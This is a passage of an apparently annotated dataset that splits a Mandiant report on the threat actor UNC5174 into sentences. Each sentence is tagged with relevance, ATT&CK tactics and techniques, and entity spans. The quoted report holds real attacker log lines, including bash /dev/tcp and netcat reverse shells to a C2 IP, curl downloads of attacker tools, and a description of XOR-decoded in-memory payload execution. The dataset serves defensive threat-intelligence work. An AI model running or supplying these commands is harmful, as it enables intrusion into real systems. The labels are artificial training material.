command.", "sentence_text": "Delete any file previously written to /tmp/watchsys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s24-1e229c", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Delete any file previously written to /tmp/watchsys.", "sentence_text": "Forcefully kill the process \"watchsys\" if it is running.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s25-7c7c8d", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Forcefully kill the process \"watchsys\" if it is running.", "sentence_text": "Download the file from a remote URL to /tmp/watchsys.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s26-229e8b", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "Download the file from a remote URL to /tmp/watchsys.", "sentence_text": "Modify the permissions of /tmp/watchsys to allow execution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s27-58fb6e", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Modify the permissions of /tmp/watchsys to allow execution.", "sentence_text": "Execute /tmp/watchsys using \"nohup\", so that the process will continue executing after the parent process is terminated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s28-15865a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "Execute /tmp/watchsys using \"nohup\", so that the process will continue executing after the parent process is terminated.", "sentence_text": "Perform a directory listing of the /tmp directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s29-872459", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "Perform a directory listing of the /tmp directory.", "sentence_text": "Nov 2 07:29:47 localhost.localdomain notice icrd_child[17602]:\n01420002:5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s30-b80e2a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Nov 2 07:29:47 localhost.localdomain notice icrd_child[17602]:\n01420002:5:", "sentence_text": "AUDIT - pid=17602 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s31-29a5a2", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "AUDIT - pid=17602 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "sentence_text": "\"rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys /tmp/watchsys &;ls -al", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s32-895852", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "\"rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys /tmp/watchsys &;ls -al", "sentence_text": "/tmp/\" SNOWLIGHT is a downloader written in C and is designed to run on Linux systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s33-b18ae5", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "/tmp/\" SNOWLIGHT is a downloader written in C and is designed to run on Linux systems.", "sentence_text": "SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "SNOWLIGHT connects to a hard-coded IP over TCP port 443 and communicates with a C2 server using a binary protocol and beaconing behavior.", "entities": [ { "text": "SNOWLIGHT", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "uses raw sockets to connect to a hard-coded IP address", "start": 10, "end": 64, "label": "Action" }, { "text": "uses a binary protocol to communicate with the command-and-control (C2 or C&C) server", "start": 87, "end": 172, "label": "Action" }, { "text": "using a fake HTTP header for an initial beacon packet", "start": 211, "end": 264, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s34-94aa50", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "SNOWLIGHT uses raw sockets to connect to a hard-coded IP address over TCP port 443 and uses a binary protocol to communicate with the command-and-control (C2 or C&C) server, though one variant has been observed using a fake HTTP header for an initial beacon packet.", "sentence_text": "Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key \"0x99\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Download a secondary ELF file after C2 communication and decode it using XOR with key 0x99.", "entities": [ { "text": "is downloaded", "start": 71, "end": 84, "label": "Action" }, { "text": "XOR decoded using the key \"0x99\"", "start": 89, "end": 121, "label": "Action" }, { "text": "secondary ELF file", "start": 52, "end": 70, "label": "MalwareTool" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s35-33ffa7", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "Upon successful communication with its C2 server, a secondary ELF file is downloaded and XOR decoded using the key \"0x99\".", "sentence_text": "Finally, the decoded secondary ELF file is loaded into memory using Linux's \"sys_memfd_create\" and executed via \"fexecve\".", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Load decoded ELF file into memory and execute via fexecve.", "entities": [ { "text": "decoded secondary ELF file", "start": 13, "end": 39, "label": "MalwareTool" }, { "text": "loaded into memory", "start": 43, "end": 61, "label": "Action" }, { "text": "Linux's \"sys_memfd_create\"", "start": 68, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "executed via \"fexecve\"", "start": 99, "end": 121, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s36-f67840", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Finally, the decoded secondary ELF file is loaded into memory using Linux's \"sys_memfd_create\" and executed via \"fexecve\".", "sentence_text": "The payload is downloaded directly into memory and executed without ever being written to disk.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Download payload into memory and execute without writing to disk.", "entities": [ { "text": "downloaded directly into memory", "start": 15, "end": 46, "label": "Action" }, { "text": "executed without ever being written to disk", "start": 51, "end": 94, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s37-df4dea", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "The payload is downloaded directly into memory and executed without ever being written to disk.", "sentence_text": "In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of \"\".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s38-813f58", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "In the SNOWLIGHT variants we observed, the payloads process will run under the hard-coded name of \"\".", "sentence_text": "This is identifiable in a running process list as a \"memfd\" process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s39-74b192", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "This is identifiable in a running process list as a \"memfd\" process.", "sentence_text": "The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "SNOWLIGHT is configured to download an obfuscated executable named GOHEAVY from attacker-controlled infrastructure.", "entities": [ { "text": "SNOWLIGHT", "start": 4, "end": 13, "label": "MalwareTool" }, { "text": "was configured to download an obfuscated executable", "start": 42, "end": 93, "label": "Action" }, { "text": "GOHEAVY", "start": 119, "end": 126, "label": "MalwareTool" }, { "text": "infrastructure related to SUPERSHELL administrators", "start": 132, "end": 183, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s40-149cb3", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "The SNOWLIGHT sample analyzed by Mandiant was configured to download an obfuscated executable that Mandiant has dubbed GOHEAVY from infrastructure related to SUPERSHELL administrators.", "sentence_text": "This payload is then executed in-memory via the previously described memfd method.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Execute payload in memory via memfd method.", "entities": [ { "text": "executed in-memory", "start": 21, "end": 39, "label": "Action" }, { "text": "memfd method", "start": 69, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s41-add466", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "This payload is then executed in-memory via the previously described memfd method.", "sentence_text": "The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:\nProcess Name: memfd:a (deleted)\nPath: empty (due to the executable being un-backed)\nArgs: ?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s42-bd6868", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "The resultant GOHEAVY process-related artifacts were observed on the compromised F5 appliance:\nProcess Name: memfd:a (deleted)\nPath: empty (due to the executable being un-backed)\nArgs: ?", "sentence_text": "User: root\nGOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s43-77f243", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "User: root\nGOREVERSE is a publicly available reverse shell backdoor written in GoLang that operates over Secure Shell (SSH).", "sentence_text": "SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s44-78785d", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "SUPERSHELL is a publicly available C2 framework published on GitHub and used extensively in related infrastructure by the administrators of SUPERSHELL.", "sentence_text": "Nov 2 07:16:15 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s45-5cb065", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "Nov 2 07:16:15 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "sentence_text": "AUDIT - pid=18778 user=admin folder= /Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s46-430c7f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "AUDIT - pid=18778 user=admin folder= /Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "sentence_text": "\"bash -i /dev/tcp/172.104.124[.]74/443 0>&1 &\"| Nov 2 07:30:37 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s47-a01d20", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "\"bash -i /dev/tcp/172.104.124[.]74/443 0>&1 &\"| Nov 2 07:30:37 localhost.localdomain notice icrd_child[18778]:\n01420002:5:", "sentence_text": "AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s48-8ede29", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "AUDIT - pid=18778 user=admin folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c", "sentence_text": "\"nc 172.104.124[.]74 443 -e /bin/bash &\" Internal Reconnaissance Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file \"/tmp/ss\" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.\ncurl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases /download/v1.2.5/App-amd64linux-noupx The file \"/tmp/ss\" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s49-7fea72", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "\"nc 172.104.124[.]74 443 -e /bin/bash &\" Internal Reconnaissance Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file \"/tmp/ss\" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.\ncurl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases /download/v1.2.5/App-amd64linux-noupx The file \"/tmp/ss\" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions.", "sentence_text": "Execution of \"/tmp/ss\" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool FSCAN ./ss", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": null, "procedure": "Execute the /tmp/ss tool and use it to scan internal subnet ranges from the compromised system.", "entities": [ { "text": "Execution of \"/tmp/ss\"", "start": 0, "end": 22, "label": "Action" }, { "text": "scan internal subnet ranges", "start": 118, "end": 145, "label": "Action" }, { "text": "/tmp/ss", "start": 14, "end": 21, "label": "MalwareTool" }, { "text": "FSCAN", "start": 195, "end": 200, "label": "MalwareTool" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s50-bfb84f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Execution of \"/tmp/ss\" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool FSCAN ./ss", "sentence_text": "-i ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s51-cba586", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "-i ", "sentence_text": "GOHEAVY Tunneler: A Closer Look UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Employ the GOHEAVY tunneler tool, obfuscated using GOBFUSCATE, for stealthy operations.", "entities": [ { "text": "UNC5174", "start": 32, "end": 39, "label": "ThreatActor" }, { "text": "employs a Golang-based tunneler tool named GOHEAVY", "start": 40, "end": 90, "label": "Action" }, { "text": "GOHEAVY", "start": 83, "end": 90, "label": "MalwareTool" }, { "text": "obfuscated using GOBFUSCATE", "start": 92, "end": 119, "label": "Action" }, { "text": "GOBFUSCATE", "start": 109, "end": 119, "label": "MalwareTool" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s52-2a16d7", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "GOHEAVY Tunneler: A Closer Look UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth.", "sentence_text": "This tool leverages the Gin framework to manage traffic routing functionalities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s53-2e3731", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "This tool leverages the Gin framework to manage traffic routing functionalities.", "sentence_text": "Interestingly, GOHEAVY continuously broadcasts the string \"SpotUdp\" to existing network interfaces.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Broadcast string SpotUdp to network interfaces.", "entities": [ { "text": "GOHEAVY", "start": 15, "end": 22, "label": "MalwareTool" }, { "text": "broadcasts the string \"SpotUdp\"", "start": 36, "end": 67, "label": "Action" }, { "text": "existing network interfaces", "start": 71, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s54-1526dc", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "Interestingly, GOHEAVY continuously broadcasts the string \"SpotUdp\" to existing network interfaces.", "sentence_text": "This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s55-91ee42", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks.", "sentence_text": "The continuous \"SpotUdp\" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:\nSLIVER client\nFFUFP\nSQLMAP\nDIRBUSTER\nMETASPLOIT\nAFROG penetration testing tool NUCLEI vulnerability scanning templates UNC5174 Closes the Door Behind Them mitigation.sh \".", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s56-2a77d8", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "The continuous \"SpotUdp\" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:\nSLIVER client\nFFUFP\nSQLMAP\nDIRBUSTER\nMETASPLOIT\nAFROG penetration testing tool NUCLEI vulnerability scanning templates UNC5174 Closes the Door Behind Them mitigation.sh \".", "sentence_text": "The additional commands were observed during their initial access on the compromised appliance:\nbash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73 28/10 14:16:23 deleted user root6 28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u 4/11/2023 03:36:30 /tmp/.del UNC5174", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s57-0faca9", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "The additional commands were observed during their initial access on the compromised appliance:\nbash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73 28/10 14:16:23 deleted user root6 28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u 4/11/2023 03:36:30 /tmp/.del UNC5174", "sentence_text": "Targets ScreenConnect Vulnerability On Feb. 21, 2024, the actor \"uteus\" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s58-537aec", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "Targets ScreenConnect Vulnerability On Feb. 21, 2024, the actor \"uteus\" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada.", "sentence_text": "Attribution\nChinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s59-9954da", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "Attribution\nChinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor.", "sentence_text": "The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s60-65ddaf", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor.", "sentence_text": "Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously indicted by the U.S. Department of Justice in 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s61-e77630", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously indicted by the U.S. Department of Justice in 2020.", "sentence_text": "On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s62-44758a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities.", "sentence_text": "This activity was associated with the UNC5174 pseudonym \"Uteus\", which shared this purported access to a U.S. military contractor and UK government organization in an online communication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s63-1439d8", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "This activity was associated with the UNC5174 pseudonym \"Uteus\", which shared this purported access to a U.S. military contractor and UK government organization in an online communication.", "sentence_text": "The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s64-bf405c", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515.", "sentence_text": "Details of the intrusion were discovered within communications on a dark web forum.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s65-22f317", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Details of the intrusion were discovered within communications on a dark web forum.", "sentence_text": "The Uteus persona indicated they had utilized a public proof of concept to perform activities on compromised systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s66-e55eab", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "The Uteus persona indicated they had utilized a public proof of concept to perform activities on compromised systems.", "sentence_text": "Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s67-504f89", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems.", "sentence_text": "While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s68-733202", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape.", "sentence_text": "These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s69-478d5f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.", "sentence_text": "Outlook and Implications UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2023-46747 and CVE-2024-1709 to achieve access.", "entities": [ { "text": "UNC5174", "start": 25, "end": 32, "label": "ThreatActor" }, { "text": "exploitation of CVE-2023-46747", "start": 33, "end": 63, "label": "Action" }, { "text": "CVE-2023-46747", "start": 49, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709", "start": 111, "end": 180, "label": "Action" }, { "text": "Connectwise ScreenConnect", "start": 127, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-1709", "start": 167, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s70-adb73f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "Outlook and Implications UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC.", "sentence_text": "China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "Conduct vulnerability research on edge appliances.", "entities": [ { "text": "China-nexus actors", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "conduct vulnerability research", "start": 31, "end": 61, "label": "Action" }, { "text": "F5 BIG-IP", "start": 102, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "ScreenConnect", "start": 116, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s71-5d1fd5", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale.", "sentence_text": "These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Rapidly exploit newly disclosed vulnerabilities using custom or publicly available proof-of-concept exploits.", "entities": [ { "text": "rapid exploitation of recently disclosed vulnerabilities", "start": 31, "end": 87, "label": "Action" }, { "text": "proof-of-concept exploits", "start": 123, "end": 148, "label": "MalwareTool" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s72-95a773", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits.", "sentence_text": "UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Threat actors target strategically selected organizations as part of an initial access broker ecosystem to support intelligence collection objectives.", "entities": [ { "text": "UNC5174", "start": 0, "end": 7, "label": 